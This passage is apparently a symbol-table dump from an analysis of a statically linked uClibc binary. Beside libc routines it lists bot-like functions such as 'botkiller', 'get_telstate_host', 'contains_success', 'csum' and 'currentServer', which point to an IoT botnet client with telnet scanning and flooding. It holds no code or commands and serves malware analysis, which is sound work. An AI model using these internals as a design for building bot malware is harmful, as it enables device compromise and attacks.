                                                                                                                          __GI_recv.symtab0x4108e084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_sbrk.symtab0x413010144FUNC<unknown>HIDDEN3
                                                                                                                          __GI_select.symtab0x40cbb0120FUNC<unknown>HIDDEN3
                                                                                                                          __GI_send.symtab0x41094084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_sendto.symtab0x4109a0128FUNC<unknown>HIDDEN3
                                                                                                                          __GI_setsid.symtab0x40cc3084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_setsockopt.symtab0x410a20120FUNC<unknown>HIDDEN3
                                                                                                                          __GI_setstate_r.symtab0x4118d0316FUNC<unknown>HIDDEN3
                                                                                                                          __GI_sigaction.symtab0x412c80232FUNC<unknown>HIDDEN3
                                                                                                                          __GI_sigaddset.symtab0x410b00104FUNC<unknown>HIDDEN3
                                                                                                                          __GI_sigemptyset.symtab0x410b7060FUNC<unknown>HIDDEN3
                                                                                                                          __GI_signal.symtab0x410bb0252FUNC<unknown>HIDDEN3
                                                                                                                          __GI_sigprocmask.symtab0x40cc90148FUNC<unknown>HIDDEN3
                                                                                                                          __GI_sleep.symtab0x412410564FUNC<unknown>HIDDEN3
                                                                                                                          __GI_snprintf.symtab0x40d14068FUNC<unknown>HIDDEN3
                                                                                                                          __GI_socket.symtab0x410aa084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_sprintf.symtab0x40d19080FUNC<unknown>HIDDEN3
                                                                                                                          __GI_srandom_r.symtab0x411abc372FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strcasecmp.symtab0x40fef0108FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strcasestr.symtab0x40ff60152FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strcat.symtab0x40f7b052FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strchr.symtab0x40f7f0256FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strcmp.symtab0x40f8f044FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strcoll.symtab0x40f8f044FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strcpy.symtab0x40f92036FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strdup.symtab0x416350144FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strlen.symtab0x40f950184FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strncat.symtab0x416240180FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strncpy.symtab0x40fa10188FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strnlen.symtab0x40fad0256FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strpbrk.symtab0x41499064FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strspn.symtab0x41630076FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strstr.symtab0x40fbd0256FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strtok.symtab0x41000032FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strtok_r.symtab0x4148c0204FUNC<unknown>HIDDEN3
                                                                                                                          __GI_strtol.symtab0x411fe028FUNC<unknown>HIDDEN3
                                                                                                                          __GI_tcgetattr.symtab0x410060176FUNC<unknown>HIDDEN3
                                                                                                                          __GI_time.symtab0x40cd3084FUNC<unknown>HIDDEN3
                                                                                                                          __GI_tolower.symtab0x4176e060FUNC<unknown>HIDDEN3
                                                                                                                          __GI_toupper.symtab0x40ce6060FUNC<unknown>HIDDEN3
                                                                                                                          __GI_vfork.symtab0x40cd9028FUNC<unknown>HIDDEN3
                                                                                                                          __GI_vfprintf.symtab0x40d8d0260FUNC<unknown>HIDDEN3
                                                                                                                          __GI_vsnprintf.symtab0x40d1e0260FUNC<unknown>HIDDEN3
                                                                                                                          __GI_wait4.symtab0x4130a088FUNC<unknown>HIDDEN3
                                                                                                                          __GI_waitpid.symtab0x40cdb028FUNC<unknown>HIDDEN3
                                                                                                                          __GI_wcrtomb.symtab0x413120112FUNC<unknown>HIDDEN3
                                                                                                                          __GI_wcsnrtombs.symtab0x4131d0228FUNC<unknown>HIDDEN3
                                                                                                                          __GI_wcsrtombs.symtab0x41319064FUNC<unknown>HIDDEN3
                                                                                                                          __GI_write.symtab0x40cdd084FUNC<unknown>HIDDEN3
                                                                                                                          __JCR_END__.symtab0x4610100OBJECT<unknown>DEFAULT9
                                                                                                                          __JCR_LIST__.symtab0x4610100OBJECT<unknown>DEFAULT9
                                                                                                                          __app_fini.symtab0x4689dc4OBJECT<unknown>HIDDEN14
                                                                                                                          __atexit_lock.symtab0x46215024OBJECT<unknown>DEFAULT11
                                                                                                                          __bsd_signal.symtab0x410bb0252FUNC<unknown>HIDDEN3
                                                                                                                          __bss_start.symtab0x4627280NOTYPE<unknown>DEFAULTSHN_ABS
                                                                                                                          __check_one_fd.symtab0x4127b4136FUNC<unknown>DEFAULT3
                                                                                                                          __ctype_b.symtab0x461e044OBJECT<unknown>DEFAULT11
                                                                                                                          __ctype_tolower.symtab0x4621844OBJECT<unknown>DEFAULT11
                                                                                                                          __ctype_toupper.symtab0x461e144OBJECT<unknown>DEFAULT11
                                                                                                                          __curbrk.symtab0x468a304OBJECT<unknown>HIDDEN14
                                                                                                                          __data_start.symtab0x461b000OBJECT<unknown>DEFAULT11
                                                                                                                          __decode_answer.symtab0x416fe0340FUNC<unknown>HIDDEN3
                                                                                                                          __decode_dotted.symtab0x417840340FUNC<unknown>HIDDEN3
                                                                                                                          __decode_header.symtab0x416df0228FUNC<unknown>HIDDEN3
                                                                                                                          __deregister_frame_info.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                          __dns_lookup.symtab0x414af02568FUNC<unknown>HIDDEN3
                                                                                                                          __do_global_ctors_aux.symtab0x4179f00FUNC<unknown>DEFAULT3
                                                                                                                          __do_global_dtors_aux.symtab0x4001600FUNC<unknown>DEFAULT3
                                                                                                                          __dso_handle.symtab0x461ae00OBJECT<unknown>HIDDEN11
                                                                                                                          __encode_dotted.symtab0x417720280FUNC<unknown>HIDDEN3
                                                                                                                          __encode_header.symtab0x416ce0272FUNC<unknown>HIDDEN3
                                                                                                                          __encode_question.symtab0x416ee0172FUNC<unknown>HIDDEN3
                                                                                                                          __environ.symtab0x4689d44OBJECT<unknown>DEFAULT14
                                                                                                                          __errno_location.symtab0x40cea024FUNC<unknown>DEFAULT3
                                                                                                                          __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __exit_cleanup.symtab0x4689c04OBJECT<unknown>HIDDEN14
                                                                                                                          __fgetc_unlocked.symtab0x414190388FUNC<unknown>DEFAULT3
                                                                                                                          __fini_array_end.symtab0x4610000NOTYPE<unknown>HIDDENSHN_ABS
                                                                                                                          __fini_array_start.symtab0x4610000NOTYPE<unknown>HIDDENSHN_ABS
                                                                                                                          __get_hosts_byname_r.symtab0x4158e0104FUNC<unknown>HIDDEN3
                                                                                                                          __getpagesize.symtab0x40c87048FUNC<unknown>DEFAULT3
                                                                                                                          __glibc_strerror_r.symtab0x40fcd068FUNC<unknown>DEFAULT3
                                                                                                                          __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __h_errno_location.symtab0x41310024FUNC<unknown>DEFAULT3
                                                                                                                          __h_errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __heap_alloc.symtab0x4112a0188FUNC<unknown>DEFAULT3
                                                                                                                          __heap_alloc_at.symtab0x411360184FUNC<unknown>DEFAULT3
                                                                                                                          __heap_free.symtab0x411468364FUNC<unknown>DEFAULT3
                                                                                                                          __heap_link_free_area.symtab0x41142044FUNC<unknown>DEFAULT3
                                                                                                                          __heap_link_free_area_after.symtab0x41144c28FUNC<unknown>DEFAULT3
                                                                                                                          __init_array_end.symtab0x4610000NOTYPE<unknown>HIDDENSHN_ABS
                                                                                                                          __init_array_start.symtab0x4610000NOTYPE<unknown>HIDDENSHN_ABS
                                                                                                                          __length_dotted.symtab0x4179a072FUNC<unknown>HIDDEN3
                                                                                                                          __length_question.symtab0x416f9072FUNC<unknown>HIDDEN3
                                                                                                                          __libc_close.symtab0x40c59084FUNC<unknown>DEFAULT3
                                                                                                                          __libc_connect.symtab0x4107a084FUNC<unknown>DEFAULT3
                                                                                                                          __libc_creat.symtab0x40caac28FUNC<unknown>DEFAULT3
                                                                                                                          __libc_fcntl.symtab0x40c3e0136FUNC<unknown>DEFAULT3
                                                                                                                          __libc_fcntl64.symtab0x40c470104FUNC<unknown>DEFAULT3
                                                                                                                          __libc_fork.symtab0x40c65084FUNC<unknown>DEFAULT3
                                                                                                                          __libc_getpid.symtab0x40c8a084FUNC<unknown>DEFAULT3
                                                                                                                          __libc_lseek64.symtab0x417630164FUNC<unknown>DEFAULT3
                                                                                                                          __libc_nanosleep.symtab0x412fb084FUNC<unknown>DEFAULT3
                                                                                                                          __libc_open.symtab0x40ca30124FUNC<unknown>DEFAULT3
                                                                                                                          __libc_poll.symtab0x415ba084FUNC<unknown>DEFAULT3
                                                                                                                          __libc_read.symtab0x40cb5084FUNC<unknown>DEFAULT3
                                                                                                                          __libc_recv.symtab0x4108e084FUNC<unknown>DEFAULT3
                                                                                                                          __libc_select.symtab0x40cbb0120FUNC<unknown>DEFAULT3
                                                                                                                          __libc_send.symtab0x41094084FUNC<unknown>DEFAULT3
                                                                                                                          __libc_sendto.symtab0x4109a0128FUNC<unknown>DEFAULT3
                                                                                                                          __libc_sigaction.symtab0x412c80232FUNC<unknown>DEFAULT3
                                                                                                                          __libc_stack_end.symtab0x4689d04OBJECT<unknown>DEFAULT14
                                                                                                                          __libc_system.symtab0x411d80568FUNC<unknown>DEFAULT3
                                                                                                                          __libc_waitpid.symtab0x40cdb028FUNC<unknown>DEFAULT3
                                                                                                                          __libc_write.symtab0x40cdd084FUNC<unknown>DEFAULT3
                                                                                                                          __malloc_heap.symtab0x4620804OBJECT<unknown>DEFAULT11
                                                                                                                          __malloc_heap_lock.symtab0x4689a024OBJECT<unknown>DEFAULT14
                                                                                                                          __malloc_sbrk_lock.symtab0x468ac024OBJECT<unknown>DEFAULT14
                                                                                                                          __nameserver.symtab0x468ae812OBJECT<unknown>HIDDEN14
                                                                                                                          __nameservers.symtab0x4627384OBJECT<unknown>HIDDEN13
                                                                                                                          __open_etc_hosts.symtab0x417140108FUNC<unknown>HIDDEN3
                                                                                                                          __open_nameservers.symtab0x415500984FUNC<unknown>HIDDEN3
                                                                                                                          __pagesize.symtab0x4689d84OBJECT<unknown>DEFAULT14
                                                                                                                          __preinit_array_end.symtab0x4610000NOTYPE<unknown>HIDDENSHN_ABS
                                                                                                                          __preinit_array_start.symtab0x4610000NOTYPE<unknown>HIDDENSHN_ABS
                                                                                                                          __pthread_initialize_minimal.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                          __pthread_mutex_init.symtab0x4127a48FUNC<unknown>DEFAULT3
                                                                                                                          __pthread_mutex_lock.symtab0x4127a48FUNC<unknown>DEFAULT3
                                                                                                                          __pthread_mutex_trylock.symtab0x4127a48FUNC<unknown>DEFAULT3
                                                                                                                          __pthread_mutex_unlock.symtab0x4127a48FUNC<unknown>DEFAULT3
                                                                                                                          __pthread_return_0.symtab0x4127a48FUNC<unknown>DEFAULT3
                                                                                                                          __pthread_return_void.symtab0x4127ac8FUNC<unknown>DEFAULT3
                                                                                                                          __raise.symtab0x4175e076FUNC<unknown>HIDDEN3
                                                                                                                          __read_etc_hosts_r.symtab0x4171ac1076FUNC<unknown>HIDDEN3
                                                                                                                          __register_frame_info.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                          __resolv_lock.symtab0x4621a024OBJECT<unknown>DEFAULT11
                                                                                                                          __rtld_fini.symtab0x4689e04OBJECT<unknown>HIDDEN14
                                                                                                                          __searchdomain.symtab0x468ad816OBJECT<unknown>HIDDEN14
                                                                                                                          __searchdomains.symtab0x46273c4OBJECT<unknown>HIDDEN13
                                                                                                                          __sigaddset.symtab0x410cd844FUNC<unknown>DEFAULT3
                                                                                                                          __sigdelset.symtab0x410d0448FUNC<unknown>DEFAULT3
                                                                                                                          __sigismember.symtab0x410cb040FUNC<unknown>DEFAULT3
                                                                                                                          __start.symtab0x4002a0100FUNC<unknown>DEFAULT3
                                                                                                                          __stdin.symtab0x461e6c4OBJECT<unknown>DEFAULT11
                                                                                                                          __stdio_READ.symtab0x415de0140FUNC<unknown>HIDDEN3
                                                                                                                          __stdio_WRITE.symtab0x4132c0280FUNC<unknown>HIDDEN3
                                                                                                                          __stdio_adjust_position.symtab0x415e70320FUNC<unknown>HIDDEN3
                                                                                                                          __stdio_fwrite.symtab0x4133e0472FUNC<unknown>HIDDEN3
                                                                                                                          __stdio_init_mutex.symtab0x40d71832FUNC<unknown>HIDDEN3
                                                                                                                          __stdio_mutex_initializer.3833.symtab0x41fdb024OBJECT<unknown>DEFAULT5
                                                                                                                          __stdio_rfill.symtab0x415fb088FUNC<unknown>HIDDEN3
                                                                                                                          __stdio_seek.symtab0x416100112FUNC<unknown>HIDDEN3
                                                                                                                          __stdio_trans2r_o.symtab0x416010228FUNC<unknown>HIDDEN3
                                                                                                                          __stdio_trans2w_o.symtab0x4135c0308FUNC<unknown>HIDDEN3
                                                                                                                          __stdio_wcommit.symtab0x40d860100FUNC<unknown>HIDDEN3
                                                                                                                          __stdout.symtab0x461e704OBJECT<unknown>DEFAULT11
                                                                                                                          __syscall_error.symtab0x412c3072FUNC<unknown>HIDDEN3
                                                                                                                          __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __syscall_fcntl64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __syscall_rt_sigaction.symtab0x412d7084FUNC<unknown>HIDDEN3
                                                                                                                          __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __uClibc_fini.symtab0x4126e0196FUNC<unknown>DEFAULT3
                                                                                                                          __uClibc_init.symtab0x41283c140FUNC<unknown>DEFAULT3
                                                                                                                          __uClibc_main.symtab0x4128c8864FUNC<unknown>DEFAULT3
                                                                                                                          __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          __uclibc_progname.symtab0x4621704OBJECT<unknown>HIDDEN11
                                                                                                                          __vfork.symtab0x40cd9028FUNC<unknown>HIDDEN3
                                                                                                                          __xpg_strerror_r.symtab0x40fd20392FUNC<unknown>DEFAULT3
                                                                                                                          __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _charpad.symtab0x40d9e0128FUNC<unknown>DEFAULT3
                                                                                                                          _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _dl_aux_init.symtab0x415b0044FUNC<unknown>DEFAULT3
                                                                                                                          _dl_phdr.symtab0x4627404OBJECT<unknown>DEFAULT13
                                                                                                                          _dl_phnum.symtab0x4627444OBJECT<unknown>DEFAULT13
                                                                                                                          _edata.symtab0x4627280NOTYPE<unknown>DEFAULTSHN_ABS
                                                                                                                          _end.symtab0x468af40NOTYPE<unknown>DEFAULTSHN_ABS
                                                                                                                          _errno.symtab0x4689f04OBJECT<unknown>DEFAULT14
                                                                                                                          _exit.symtab0x40c4e080FUNC<unknown>DEFAULT3
                                                                                                                          _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _fbss.symtab0x4627280NOTYPE<unknown>DEFAULTSHN_ABS
                                                                                                                          _fdata.symtab0x461ae00NOTYPE<unknown>DEFAULT11
                                                                                                                          _fini.symtab0x417a6028FUNC<unknown>DEFAULT4
                                                                                                                          _fixed_buffers.symtab0x4667988192OBJECT<unknown>DEFAULT14
                                                                                                                          _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _fp_out_narrow.symtab0x40da60228FUNC<unknown>DEFAULT3
                                                                                                                          _fpmaxtostr.symtab0x4139402120FUNC<unknown>HIDDEN3
                                                                                                                          _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _ftext.symtab0x4001600NOTYPE<unknown>DEFAULT3
                                                                                                                          _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _gp.symtab0x46a1d00NOTYPE<unknown>DEFAULTSHN_ABS
                                                                                                                          _gp_disp.symtab0x00OBJECT<unknown>DEFAULTSHN_UNDEF
                                                                                                                          _h_errno.symtab0x4689f44OBJECT<unknown>DEFAULT14
                                                                                                                          _init.symtab0x4000cc28FUNC<unknown>DEFAULT2
                                                                                                                          _load_inttype.symtab0x413700136FUNC<unknown>HIDDEN3
                                                                                                                          _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _ppfs_init.symtab0x40e2f0220FUNC<unknown>HIDDEN3
                                                                                                                          _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _ppfs_parsespec.symtab0x40e6cc1512FUNC<unknown>HIDDEN3
                                                                                                                          _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _ppfs_prepargs.symtab0x40e3d0100FUNC<unknown>HIDDEN3
                                                                                                                          _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _ppfs_setargs.symtab0x40e440544FUNC<unknown>HIDDEN3
                                                                                                                          _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _promoted_size.symtab0x40e660108FUNC<unknown>DEFAULT3
                                                                                                                          _pthread_cleanup_pop_restore.symtab0x4127ac8FUNC<unknown>DEFAULT3
                                                                                                                          _pthread_cleanup_push_defer.symtab0x4127ac8FUNC<unknown>DEFAULT3
                                                                                                                          _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _sigintr.symtab0x468a40128OBJECT<unknown>HIDDEN14
                                                                                                                          _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _stdio_fopen.symtab0x40d2f0880FUNC<unknown>HIDDEN3
                                                                                                                          _stdio_init.symtab0x40d660184FUNC<unknown>HIDDEN3
                                                                                                                          _stdio_openlist.symtab0x461e744OBJECT<unknown>DEFAULT11
                                                                                                                          _stdio_openlist_add_lock.symtab0x461e2024OBJECT<unknown>DEFAULT11
                                                                                                                          _stdio_openlist_dec_use.symtab0x40ef20400FUNC<unknown>DEFAULT3
                                                                                                                          _stdio_openlist_del_count.symtab0x4667944OBJECT<unknown>DEFAULT14
                                                                                                                          _stdio_openlist_del_lock.symtab0x461e3824OBJECT<unknown>DEFAULT11
                                                                                                                          _stdio_openlist_use_count.symtab0x4667904OBJECT<unknown>DEFAULT14
                                                                                                                          _stdio_streams.symtab0x461e78240OBJECT<unknown>DEFAULT11
                                                                                                                          _stdio_term.symtab0x40d738284FUNC<unknown>HIDDEN3
                                                                                                                          _stdio_user_locking.symtab0x461e504OBJECT<unknown>DEFAULT11
                                                                                                                          _stdlib_strto_l.symtab0x412000592FUNC<unknown>HIDDEN3
                                                                                                                          _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _store_inttype.symtab0x41379068FUNC<unknown>HIDDEN3
                                                                                                                          _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _string_syserrmsgs.symtab0x41ff202934OBJECT<unknown>HIDDEN5
                                                                                                                          _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _uintmaxtostr.symtab0x4137e0340FUNC<unknown>HIDDEN3
                                                                                                                          _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _vfprintf_internal.symtab0x40db441960FUNC<unknown>HIDDEN3
                                                                                                                          _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          abort.symtab0x415950428FUNC<unknown>DEFAULT3
                                                                                                                          abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          advance_state.symtab0x402d88204FUNC<unknown>DEFAULT3
                                                                                                                          advances.symtab0x461d8c20OBJECT<unknown>DEFAULT11
                                                                                                                          advances2.symtab0x461dd044OBJECT<unknown>DEFAULT11
                                                                                                                          atoi.symtab0x411fc028FUNC<unknown>DEFAULT3
                                                                                                                          atol.symtab0x411fc028FUNC<unknown>DEFAULT3
                                                                                                                          atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          bcopy.symtab0x40feb032FUNC<unknown>DEFAULT3
                                                                                                                          bcopy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          been_there_done_that.symtab0x468a204OBJECT<unknown>DEFAULT14
                                                                                                                          been_there_done_that.2792.symtab0x4689e44OBJECT<unknown>DEFAULT14
                                                                                                                          botkiller.symtab0x407ed8420FUNC<unknown>DEFAULT3
                                                                                                                          brk.symtab0x415b30112FUNC<unknown>DEFAULT3
                                                                                                                          brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          bsd_signal.symtab0x410bb0252FUNC<unknown>DEFAULT3
                                                                                                                          buf.2613.symtab0x4687b016OBJECT<unknown>DEFAULT14
                                                                                                                          buf.4833.symtab0x4687c0460OBJECT<unknown>DEFAULT14
                                                                                                                          bzero.symtab0x40fed028FUNC<unknown>DEFAULT3
                                                                                                                          bzero.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          c.symtab0x461b544OBJECT<unknown>DEFAULT11
                                                                                                                          chdir.symtab0x40c53088FUNC<unknown>DEFAULT3
                                                                                                                          chdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          client1.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          close.symtab0x40c59084FUNC<unknown>DEFAULT3
                                                                                                                          close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          completed.2296.symtab0x4627501OBJECT<unknown>DEFAULT14
                                                                                                                          connect.symtab0x4107a084FUNC<unknown>DEFAULT3
                                                                                                                          connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          connectTimeout.symtab0x403114828FUNC<unknown>DEFAULT3
                                                                                                                          contains_fail.symtab0x402f1088FUNC<unknown>DEFAULT3
                                                                                                                          contains_response.symtab0x402f68148FUNC<unknown>DEFAULT3
                                                                                                                          contains_string.symtab0x402ffc280FUNC<unknown>DEFAULT3
                                                                                                                          contains_success.symtab0x402eb888FUNC<unknown>DEFAULT3
                                                                                                                          creat.symtab0x40caac28FUNC<unknown>DEFAULT3
                                                                                                                          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          csum.symtab0x404744460FUNC<unknown>DEFAULT3
                                                                                                                          currentServer.symtab0x461b104OBJECT<unknown>DEFAULT11
                                                                                                                          data_start.symtab0x461b000OBJECT<unknown>DEFAULT11
                                                                                                                          decodea.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          dup2.symtab0x40c5f084FUNC<unknown>DEFAULT3
                                                                                                                          dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          environ.symtab0x4689d44OBJECT<unknown>DEFAULT14
                                                                                                                          errno.symtab0x4689f04OBJECT<unknown>DEFAULT14
                                                                                                                          errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          estridx.symtab0x41fe90126OBJECT<unknown>DEFAULT5
                                                                                                                          execl.symtab0x412340204FUNC<unknown>DEFAULT3
                                                                                                                          execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          execve.symtab0x412dd084FUNC<unknown>DEFAULT3
                                                                                                                          execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          exit.symtab0x412250236FUNC<unknown>DEFAULT3
                                                                                                                          exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          exp10_table.symtab0x420e4872OBJECT<unknown>DEFAULT5
                                                                                                                          fails.symtab0x461da032OBJECT<unknown>DEFAULT11
                                                                                                                          fclose.symtab0x40cec0512FUNC<unknown>DEFAULT3
                                                                                                                          fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fcntl.symtab0x40c3e0136FUNC<unknown>DEFAULT3
                                                                                                                          fcntl64.symtab0x40c470104FUNC<unknown>DEFAULT3
                                                                                                                          fdgets.symtab0x401c54292FUNC<unknown>DEFAULT3
                                                                                                                          fdopen_pids.symtab0x46678c4OBJECT<unknown>DEFAULT14
                                                                                                                          fdpclose.symtab0x4019d8636FUNC<unknown>DEFAULT3
                                                                                                                          fdpopen.symtab0x4015641140FUNC<unknown>DEFAULT3
                                                                                                                          feof.symtab0x40ecc0168FUNC<unknown>DEFAULT3
                                                                                                                          feof.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fflush_unlocked.symtab0x40f0b0628FUNC<unknown>DEFAULT3
                                                                                                                          fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fgetc_unlocked.symtab0x414190388FUNC<unknown>DEFAULT3
                                                                                                                          fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fgets.symtab0x40ed70216FUNC<unknown>DEFAULT3
                                                                                                                          fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fgets_unlocked.symtab0x40f330268FUNC<unknown>DEFAULT3
                                                                                                                          fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fmt.symtab0x420e3020OBJECT<unknown>DEFAULT5
                                                                                                                          fopen.symtab0x40d0c028FUNC<unknown>DEFAULT3
                                                                                                                          fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fork.symtab0x40c65084FUNC<unknown>DEFAULT3
                                                                                                                          fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fputs.symtab0x40ee50200FUNC<unknown>DEFAULT3
                                                                                                                          fputs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fputs_unlocked.symtab0x40f440128FUNC<unknown>DEFAULT3
                                                                                                                          fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          frame_dummy.symtab0x40021c0FUNC<unknown>DEFAULT3
                                                                                                                          free.symtab0x410f30396FUNC<unknown>DEFAULT3
                                                                                                                          free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fseek.symtab0x415c0068FUNC<unknown>DEFAULT3
                                                                                                                          fseeko.symtab0x415c0068FUNC<unknown>DEFAULT3
                                                                                                                          fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fseeko64.symtab0x415c50388FUNC<unknown>DEFAULT3
                                                                                                                          fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          fwrite_unlocked.symtab0x40f4c0280FUNC<unknown>DEFAULT3
                                                                                                                          fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getBogos.symtab0x4021fc772FUNC<unknown>DEFAULT3
                                                                                                                          getBuild.symtab0x40b0bc56FUNC<unknown>DEFAULT3
                                                                                                                          getCores.symtab0x402500316FUNC<unknown>DEFAULT3
                                                                                                                          getHost.symtab0x4020b8160FUNC<unknown>DEFAULT3
                                                                                                                          getOurIP.symtab0x40ad3c896FUNC<unknown>DEFAULT3
                                                                                                                          get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          get_telstate_host.symtab0x402ae8104FUNC<unknown>DEFAULT3
                                                                                                                          getc_unlocked.symtab0x414190388FUNC<unknown>DEFAULT3
                                                                                                                          getcwd.symtab0x40c6b0364FUNC<unknown>DEFAULT3
                                                                                                                          getcwd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getdtablesize.symtab0x40c82072FUNC<unknown>DEFAULT3
                                                                                                                          getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getegid.symtab0x412e3088FUNC<unknown>DEFAULT3
                                                                                                                          getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          geteuid.symtab0x412e9088FUNC<unknown>DEFAULT3
                                                                                                                          geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getgid.symtab0x412ef084FUNC<unknown>DEFAULT3
